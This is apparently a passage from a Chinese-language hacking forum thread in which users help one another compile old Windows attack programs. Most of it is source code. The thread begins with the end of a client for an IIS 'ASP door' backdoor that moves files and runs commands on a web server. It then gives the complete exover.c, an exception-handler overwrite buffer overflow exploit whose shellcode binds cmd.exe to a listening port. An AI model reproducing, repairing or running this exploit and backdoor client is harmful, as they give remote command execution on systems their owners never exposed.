*fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } void iisput(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisput filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin put file:%s",filename); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); fpt=CreateFile(filename,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,0); filesize=GetFileSize(fpt,&filesizehigh); strcpy(buff,"put "); *(int *)(buff+4)=filesize; filesize=*(int *)(buff+4); strcpy(buff+0x8,filename2); newsend(fd,buff,i+0x9,0); printf("\n put file:%s to file:%s %d bytes",filename,filename2,filesize); Sleep(1000); while(filesize>0){ size=0x800; ReadFile(fpt,buff,size,&size,NULL); if(size>0){ filesize-=size; newsend(fd,buff,size,0); // Sleep(0100); } } // size=filesize; // ReadFile(fpt,buff,size,&size,NULL); // if(size>0) send(fd,buff,size,0); CloseHandle(fpt); j=1; ioctlsocket(fd, FIONBIO, &j); printf("\n put file ok!\n"); Sleep(1000); } void iisget(int fd,char *str){ char *filename; char *filename2; FILE *fpt; char buff[0x2000]; int size=0x2000,i,j,filesize,filesizehigh; filename="\0"; filename2="\0"; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ filename=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } ++i; ++str; for(;i<j;++i,++str){ if(*str!=' '){ filename2=str; break; } } for(;i<j;++i,++str){ if(*str==' ') { *str=0; break; } } if(filename=="\x0") { printf("\n iisget filename [path\\fiename]\n"); return; } if(filename2=="\x0") filename2=filename; printf("\n begin get file:%s",filename); fpt=CreateFileA(filename,FILE_FLAG_WRITE_THROUGH+GENERIC_WRITE,FILE_SHARE_READ,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); strcpy(buff,"get "); strcpy(buff+0x4,filename2); newsend(fd,buff,i+0x5,0); printf("\n get file:%s from file:%s",filename,filename2); j=0; ioctlsocket(fd, FIONBIO, &j); i=0; filesize=0; j=0; while(j<100){ // Sleep(100); i=newrecv(fd,buff,0x800,0); if(i>0){ buff[i]=0; if(memcmp(buff,"size",4)==0){ filesize=*(int *)(buff+4); j=100; } else { /* for(j=0;j<i;++j){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[j]^=lockcharvar; // DATAXORCODE; } */ j=0; printf("\n recv %s",buff); } } else ++j; // if(j>1000) i=0; } printf("\n file %d bytes %d\n",filesize,i); if(i>8){ i-=8; filesize-=i; WriteFile(fpt,buff+8,i,&i,NULL); } while(filesize>0){ size=newrecv(fd,buff,0x800,0); if(size>0){ filesize-=size; WriteFile(fpt,buff,size,&size,NULL); } else { if(size==0) { printf("\n ftp close \n "); } else { printf("\n Sleep(100)"); Sleep(100); } } } CloseHandle(fpt); printf("\n get file ok!\n"); j=1; ioctlsocket(fd, FIONBIO, &j); } void iisreset(int fd,char *str){ char buff[0x2000]; int i,j; printf("\nreset xor data.\n"); Sleep(1000); j=0; ioctlsocket(fd, FIONBIO, &j); strcpy(buff,"reset"); newsend(fd,buff,strlen(buff),0); Sleep(1000); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; while(1){ j=recv(fd,buff,0x2000,0); if(j>0){ buff[j]=0; for(i=0;i<j;++i){ if(buff[i]==0) buff[i]='b'; } // printf("\nrecv 0x%x bytes:%s",j,buff); if(strstr(buff,"xordatareset")!=0){ printf("\nxor data reset ok.\n"); for(i=strstr(buff,"xordatareset")-buff+0x0c;i<j;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } break; } } // else if(j==0) break; // strcpy(buff,"\r\nmkdir d:\\test6\r\n"); // newsend(fd,buff,strlen(buff),0); } Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); // printf("aaa"); } void iisdie(int fd,char *str){ char buff[0x200]; int j; printf("\niis die.\n"); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisrr "); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; } void iiscmd(int fd,char *str){ char *cmd="\0"; char buff[2000]; int i,j; j=strlen(str); for(i=0;i<j;++i,++str){ if(*str!=' '){ cmd=str; break; } } j=strlen(str); for(i=0;i<j;++i){ if(*(str+j-i-1)!=' ') { break; } else *(str+j-i-1)=0; } if(cmd=="\x0") { printf("\niiscmd cmd\n"); return; } printf("\nbegin run cmd:%s",cmd); j=0; ioctlsocket(fd, FIONBIO, &j); Sleep(1000); strcpy(buff,"iisc "); strcat(buff,cmd); newsend(fd,buff,strlen(buff),0); Sleep(1000); j=1; ioctlsocket(fd, FIONBIO, &j); /* lockintvar1=LOCKBIGNUM2%LOCKBIGNUM; lockintvar2=lockintvar1; */ } int newrecv(int fd,char *buff,int size,int flag){ int i,k; k=recv(fd,buff,size,flag); if(xordatabegin==1){ for(i=0;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } else{ if(k>0){ buff[k]=0; if(strstr(buff,"XORDATA")!=0) { xordatabegin=1; for(i=strstr(buff,"XORDATA")-buff+8;i<k;++i){ lockintvar1=lockintvar1*0x100; lockintvar1=lockintvar1%LOCKBIGNUM; lockcharvar=lockintvar1%0x100; buff[i]^=lockcharvar; // DATAXORCODE; } } } } return(k); } int newsend(int fd,char *buff,int size,int flag){ int i; for(i=0;i<size;++i){ lockintvar2=lockintvar2*0x100; lockintvar2=lockintvar2%LOCKBIGNUM; lockcharvar=lockintvar2%0x100; buff[i]^=lockcharvar; // DATAXORCODE; // buff[i]^=DATAXORCODE; } return(send(fd,buff,size,flag)); } void iishelp(){ printf("\nusage:"); printf("\niisget filename filename. get file from web server."); printf("\niisput filename filename. put file to web server."); printf("\niiscmd cmd. run cmd on web server."); printf("\niisreset. reset the xor data."); printf("\niisdie. reset the asp door."); printf("\n\n"); } |
|
|
aspcode.c编译可以通过,但能否实现攻击功能,请测试一下。
|
|
|
网址http://www.nsfocus.net/index.php?act=magazine&do=view&mid=682
包含两个独立的源程序代码:except.c和exover.c,分别是存在漏洞的程序和攻击程序。 对于except.c,欲成功编译,需要加上ws2_32.lib库文件的支持,加在#include头文件之后,即: #include <windows.h> #include <winsock.h> #include <stdio.h> // 增加对ws2_32.lib库文件的支持 #pragma comment (lib, "ws2_32.lib") int main(int argc, char **argv) 而对exover.c,需要作如下修改: 1、增加 #pragma comment (lib, "ws2_32.lib") 2、将某些被回车换行符割断的变量名和代码行接到一行上(看VC提示哪行报错,转到那行就明白了) 3、代码段 _asm { mov ESI,ESP cmp ESI,ESP } 前的大括号}是多余的,必须去掉 修改后的代码如下供参考,同样编译通过,但能否事先袁哥所说的攻击请测试一下: /* 利用异常结构绕过溢出保护攻击的攻击程序exover.c。 上面程序运行在win2000下此攻击程序溢出成功。 vc6.0下编译通过。 yuange@nsfocus.com */ /* except overflow program ver 1.0 copy by yuange <yuange@163.net> 2000。06。20 */ #include <windows.h> #include <winsock.h> #include <stdio.h> #pragma comment (lib, "ws2_32.lib") #define FNENDLONG 0x08 #define NOPCODE 0x90 #define NOPLONG 0x20 #define BUFFSIZE 0x20000 #define RETEIPADDRESS 0x0 #define SHELLPORT 0x1f90 /* 0x1f90=8080 */ #define WEBPORT 1080 void shellcodefnlock(); void shellcodefn(); void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len); int main(int argc, char **argv) { char *server; char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0" "CreateProcessA""\x0""CloseHandle""\x0" "PeekNamedPipe""\x0" "ReadFile""\x0""WriteFile""\x0" "wsock32.dll""\x0""socket""\x0" "bind""\x0""listen""\x0" "accept""\x0""send""\x0" "recv""\x0""ioctlsocket""\x0" "closesocket""\x0" "cmd.exe""\x0""exit\x0d\x0a""\x0" "strend"; /* shellcode用到的api名等字符串 */ char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90"; char eipwinnt[]="\x63\x0d\xfa\x7f"; /* jmp ebx address */ /* win2000发生异常时ebx指向异常结构, winnt 有的版本是esi,有的版本是edi */ char JMPNEXTJMP[]="\x90\x90\x90\x2d"; /* 0x2d sub eax,num32 用于平衡后面的4字节任意代码,使得连续覆盖溢出点的这段代码指令等效于NOP */ char JMPSHELL[]="\xe9\x40\xf0\xff\xff"; char buff[BUFFSIZE]; char recvbuff[BUFFSIZE]; char shellcodebuff[0x1000]; struct sockaddr_in s_in2,s_in3; struct hostent *he; char *shellcodefnadd,*chkespadd; unsigned int sendpacketlong; int i,j,k; unsigned char temp; int fd; u_short port,port1,shellcodeport; SOCKET d_ip; WSADATA wsaData; int offset=0; int OVERADD=RETEIPADDRESS; int OVERADD2=0xfb8; int result= WSAStartup(MAKEWORD(1, 1), &wsaData); if (result != 0) { fprintf(stderr, "Your computer was not connected " "to the Internet at the time that " "this program was launched, or you " "do not have a 32-bit " "connection to the Internet."); exit(1); } if(argc>3) port=atoi(argv[3]); else port=WEBPORT; if(argc <2){ WSACleanup( ); fprintf(stderr, "\n except over 1.0."); fprintf(stderr, "\n copy by yuange 2000.06.20."); fprintf(stderr, "\n welcome to my homepage http://yuange.yeah.net."); fprintf(stderr, "\n usage: %s <server> [shellport] [webport] \n", argv[0]); exit(1); } else server = argv[1]; d_ip = inet_addr(server); if(d_ip==-1){ he = gethostbyname(server); if(!he) { WSACleanup( ); printf("\n Can't get the ip of %s !\n",server); exit(1); } else memcpy(&d_ip, he->h_addr, 4); } fd = socket(AF_INET, SOCK_STREAM,0); i=8000; setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i)); s_in3.sin_family = AF_INET; s_in3.sin_port = htons(port); s_in3.sin_addr.s_addr = d_ip; printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port)); if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0) closesocket(fd); WSACleanup( ); fprintf(stderr,"\n connect err."); exit(1); //} __asm { mov ESI,ESP cmp ESI,ESP } _chkesp(); chkespadd=_chkesp; temp=*chkespadd; if(temp==0xe9) { ++chkespadd; i=*(int*)chkespadd; chkespadd+=i; chkespadd+=4; } shellcodefnadd=shellcodefnlock; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x500;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memset(buff,NOPCODE,BUFFSIZE); memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80); shellcodefnadd=shellcodefn; temp=*shellcodefnadd; if(temp==0xe9) { ++shellcodefnadd; k=*(int *)shellcodefnadd; shellcodefnadd+=k; shellcodefnadd+=4; } for(k=0;k<=0x1000;++k){ if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break; } memcpy(shellcodebuff,shellcodefnadd,k); cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k); for (i=0;i<0x400;++i){ if(memcmp(str+i,"strend",6)==0) break; } memcpy(shellcodebuff+k,str,i); if(argc>2) shellcodeport=atoi(argv[2]); else shellcodeport=SHELLPORT; if(shellcodeport==0) shellcodeport=SHELLPORT; shellcodeport=htons(shellcodeport); *(u_short *)(shellcodebuff+k)=shellcodeport; fprintf(stderr,"\n shellport %d",htons(shellcodeport)); sendpacketlong=k+i; for(k=0;k<=0x200;++k){ if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break; } for(i=0;i<sendpacketlong;++i){ temp=shellcodebuff[i]; if(temp<=0x10||temp=='0'){ /* 对shellcode的特殊字符编码 */ buff[OVERADD+NOPLONG+k]='0'; ++k; temp+=0x40; } buff[OVERADD+NOPLONG+k]=temp; ++k; } for(i=-0x30;i<0x20;i+=8){ memcpy(buff+OVERADD2+i,JMPNEXTJMP,4); /* 覆盖异常结构的下一个异常链next数据,发生异常时ebx制向这 与通常的发生溢出时ESP指向溢出代码附近不一样,发生异常时 的ESP不在这附近 */ memcpy(buff+OVERADD2+i+4,eipwinnt,4); /* 覆盖异常结构的程序指针 发生异常时会转到这指针去运行 这覆盖的是一个jmp ebx指令的地址 */ } /* 连续覆盖,增大覆盖掉异常结构的可能性 */ memcpy(buff+OVERADD2+8,JMPSHELL,5); /* 跳到shellcode去的跳转代码,远跳转。 */ sendpacketlong=0x1000-0x10; for(i=0;i<1;++i){ j=sendpacketlong; fprintf(stderr,"\n send packet %d bytes.",j); send(fd,buff,j,0); k=recv(fd,recvbuff,0x1000,0); if(k>0){ recvbuff[k]=0; fprintf(stderr,"\n recv:\n %s",recvbuff); } } closesocket(fd); WSACleanup( ); return(0); } void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop /* 用于定位下面一小段汇编指令的NOP 串 */ jmp next getediadd: pop EDI push EDI pop ESI xor ecx,ecx mov cx,0x0fd0 looplock: lodsb cmp al,0x30 jnz sto lodsb sub al,0x40 sto: stosb loop looplock jmp shell next: call getediadd /* 解码shellcode */ shell: NOP NOP NOP NOP NOP NOP NOP NOP } } /* 真正实现功能的shellcode */ /* 本shellcode实现开端口绑定cmd.exe 的功能 */ void shellcodefn() { char Buff[0x800]; int *except[3]; FARPROC closesocketadd; FARPROC ioctlsocketadd; FARPROC recvadd; FARPROC sendadd; FARPROC acceptadd; FARPROC listenadd; FARPROC bindadd; FARPROC socketadd; /* FARPROC WSAStartupadd; */ FARPROC NOPNOP; FARPROC WriteFileadd; FARPROC ReadFileadd; FARPROC PeekNamedPipeadd; FARPROC CloseHandleadd; FARPROC CreateProcessadd; FARPROC CreatePipeadd; FARPROC procloadlib; FARPROC apifnadd[1]; FARPROC procgetadd=0; char *stradd; int imgbase,fnbase,k,l; HANDLE libhandle; STARTUPINFO siinfo; SOCKET listenFD,clientFD; struct sockaddr_in server; int iAddrSize = sizeof(server); int lBytesRead; u_short shellcodeport; PROCESS_INFORMATION ProcessInformation; HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2; SECURITY_ATTRIBUTES sa; _asm { jmp nextcall getstradd: pop stradd lea EDI,except mov eax,dword ptr FS:[0] mov dword ptr [edi+0x08],eax mov dword ptr FS:[0],EDI } except[0]=0xffffffff; except[1]=stradd-0x07; imgbase=0x77e00000; _asm{ call getexceptretadd } for(;imgbase<0xbffa0000,procgetadd==0;){ imgbase+=0x10000; if(imgbase==0x78000000) imgbase=0xbff00000; if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){ fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase; k=*(int *)(fnbase+0xc)+imgbase; if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){ libhandle=imgbase; k=imgbase+*(int *)(fnbase+0x20); for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){ if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){ k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24)); k+=*(int *)(fnbase+0x10)-1; k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c)); procgetadd=k+imgbase; break; } } } } } /* 搜索KERNEL32。DLL模块地址和API函数 GetProcAddress地址 注意这儿处理了搜索页面不在情况。 */ _asm{ lea edi,except mov eax,dword ptr [edi+0x08] mov dword ptr fs:[0],eax } if(procgetadd==0) goto die ; shellcodeport=*(u_short *)stradd; stradd+=2; for(k=1;k<17;++k) { if(k==8) libhandle=procloadlib(stradd); else apifnadd[k]=procgetadd(libhandle,stradd); for(;;++stradd){ if(*(stradd)==0&&*(stradd+1)!=0) break; } ++stradd; } /* WSAStartupadd(MAKEWORD(1, 1), &wsaData); */ listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port =shellcodeport; server.sin_addr.s_addr=0; k=1; while(k!=0){ k=bindadd(listenFD,&server,sizeof(server)); server.sin_port+=0x100; if(server.sin_port<0x100) ++server.sin_port; } listenadd(listenFD,10); while(1){ clientFD=acceptadd(listenFD,&server,&iAddrSize); sa.nLength=12; sa.lpSecurityDescriptor=0; sa.bInheritHandle=TRUE; CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0); CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0); /* ZeroMemory(&siinfo,sizeof(siinfo)); */ _asm{ lea EDI,siinfo xor eax,eax mov ecx,0x11 repnz stosd } siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; siinfo.wShowWindow = SW_HIDE; siinfo.hStdInput = hReadPipe2; siinfo.hStdOutput=hWritePipe1; siinfo.hStdError =hWritePipe1; k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation); PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); /* k=1; ioctlsocketadd(clientFD, FIONBIO, &k); */ /* 还是阻塞模式比较好,占用CPU时间少,要不下面死掉的时候就老占用CPU, 造成受攻击系统反应比较慢。 */ while(1){ PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0); if(lBytesRead>0) { ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0); if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0); else sendadd(clientFD,stradd,8,0); } else{ lBytesRead=recvadd(clientFD,Buff,1024,0); if(lBytesRead<=0){ lBytesRead=6; WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0); closesocketadd(clientFD); break; /* TELNET连接中断,退出等到再一次连接 */ } else{ sendadd(clientFD,Buff,lBytesRead,0); /* 回显,有些TELNET不能设置本地响应会看不到命令输入很不方便。 */ WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0); } } } } die: goto die ; _asm{ getexceptretadd: pop eax push eax mov edi,dword ptr [stradd] mov dword ptr [edi-0x0e],eax ret errprogram: mov eax,dword ptr [esp+0x0c] add eax,0xb8 mov dword ptr [eax],0x11223344 /* stradd-0xe */ xor eax,eax /* 2 bytes */ ret /* 1 bytes */ execptprogram: jmp errprogram /* 2 bytes stradd-7 */ nextcall: call getstradd /* 5 bytes */ NOP NOP NOP NOP NOP NOP NOP NOP NOP } } /* 清除shellcdoe里面的chkesp调用 */ void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len) { int i,k; unsigned char temp; char *calladd; for(i=0;i<len;++i){ temp=shellbuff[i]; if(temp==0xe8){ k=*(int *)(shellbuff+i+1); calladd=fnadd; calladd+=k; calladd+=i; calladd+=5; if(calladd==chkesp){ shellbuff[i]=0x90; shellbuff[i+1]=0x43; // inc ebx shellbuff[i+2]=0x4b; // dec ebx shellbuff[i+3]=0x43; shellbuff[i+4]=0x4b; } } } } |
|
|
这是代码作者有意留下的一些初等问题,主要就是想考验一下我等菜鸟吧。
|
|
|
 谢谢jeffcjh大侠 啊哈 终于编译通过了 |
|
|
他的文章
